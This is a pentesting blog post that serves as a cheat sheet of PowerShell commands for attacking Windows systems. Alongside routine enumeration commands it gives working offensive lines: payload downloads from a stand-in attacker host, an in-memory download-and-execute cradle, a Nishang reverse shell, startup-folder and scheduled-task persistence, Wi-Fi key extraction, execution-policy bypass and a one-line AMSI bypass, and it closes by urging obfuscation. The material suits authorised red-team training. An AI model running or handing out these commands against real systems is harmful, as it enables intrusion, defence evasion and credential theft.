Leave a Comment / Programming & Scripting, Uncategorized / By

PowerShell for Pentesters: What You Need to Know

PowerShell is one of the most powerful tools in a pentester’s Windows toolbox. If you’re targeting a Windows environment — and let’s be real, you will be — you need to understand PowerShell not just as a scripting language, but as a full-blown post-exploitation Swiss Army knife.

In this post, we’re skipping the theory-heavy stuff. You already know PowerShell is important. We’re going to look at how it works (very briefly), then jump into the real meat: the commands and scripts every pentester should have in their toolkit.

Very Quick: How PowerShell Works

PowerShell is a command-line shell and scripting language built on .NET. It’s designed for system administration and automation. The key thing to know is:

  • It lets you interact with the Windows OS and its components (like the registry, services, and event logs).
  • It can run scripts, download payloads, modify settings, and pull system information — all from the terminal.
  • It runs in-memory, making it stealthy for red team ops.

PowerShell Commands and Techniques for Pentesters

Let’s get into what you’re really here for — the techniques, commands, and scripts that you’ll actually use during your engagements.

1. Recon & Enumeration

Get System Info

systeminfo

Basic but useful. Shows OS version, hotfixes, system uptime, etc.

Who’s Logged In?

query user

Get Local Users

Get-LocalUser

Check Group Membership

Get-LocalGroupMember -Group "Administrators"

Environment Variables

Get-ChildItem Env:

Network Info

ipconfig /all
Get-NetIPConfiguration
Get-NetTCPConnection

Running Processes

Get-Process

2. File & Directory Interaction

List Files and Folders

Get-ChildItem -Force

Read a File

Get-Content .\filename.txt

Search for Keywords (Passwords, Keys, etc.)

Select-String -Path *.txt -Pattern "password"

Download a File from the Internet

Invoke-WebRequest -Uri "http://attacker.com/file.exe" -OutFile "file.exe"

Or:

(New-Object System.Net.WebClient).DownloadFile("http://attacker.com/file.exe", "file.exe")

3. Lateral Movement & Execution

List Network Shares

net view \\TARGET

List Sessions on Remote System

quser /server:TARGET

Execute Remote Command with WMI

Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList "cmd.exe /c calc.exe" -ComputerName TARGET

Use PsExec Style Alternative

Invoke-Command -ComputerName TARGET -ScriptBlock { whoami }

4. Persistence Techniques

Add a Script to Startup Folder

Copy-Item "payload.ps1" "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\payload.ps1"

Scheduled Task

schtasks /create /tn "Updater" /tr "powershell.exe -ExecutionPolicy Bypass -File payload.ps1" /sc minute /mo 1

5. Credential Dumping & User Info

Check for Stored Credentials

cmdkey /list

Get Wi-Fi Passwords

netsh wlan show profile name="WiFiName" key=clear

Enumerate SAM & LSA

You’ll need SYSTEM privileges and tools like mimikatz, but this is where PowerShell shines for delivery and execution.

6. Payload Execution In-Memory

Run Encoded Script

powershell.exe -EncodedCommand [base64payload]

Bypass Execution Policy

powershell.exe -ExecutionPolicy Bypass -File script.ps1

Or inline:

powershell -ep bypass -Command "Invoke-WebRequest ..."

PowerShell Scripts Every Pentester Should Know

1. PowerView

Recon tool for AD environments. Part of PowerSploit.

  • Enumerate domains, users, groups, shares, sessions.
  • Example:
Import-Module .\PowerView.ps1
Get-NetUser

2. PowerUp

Privilege escalation tool for local enumeration.

Import-Module .\PowerUp.ps1
Invoke-AllChecks

3. Nishang

A collection of offensive PowerShell scripts.

Examples:

  • Reverse shell: Invoke-PowerShellTcp
  • Download & Execute: Invoke-DownloadExecute
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.5 -Port 4444

4. PowerShell Empire (Agent Scripts)

A full C2 framework. You don’t need to run the full Empire server — even just understanding the generated agent scripts is useful for custom payloads.

Bypassing Defenses

PowerShell is heavily monitored now by AV and EDR. Some common evasion techniques:

  • Use encoded payloads (-EncodedCommand)
  • Load scripts into memory (IEX (New-Object Net.WebClient).DownloadString(...))
  • Avoid writing to disk when possible
  • Use AMSI bypasses (with caution):
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)

Final Thoughts

PowerShell gives you direct access to the beating heart of a Windows system. Whether you’re enumerating users, escalating privileges, or moving laterally across a network — PowerShell lets you do it quietly and efficiently.

But remember: with great power comes great detection. Learn it. Practice it. Obfuscate it. Master it.

Related Posts

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top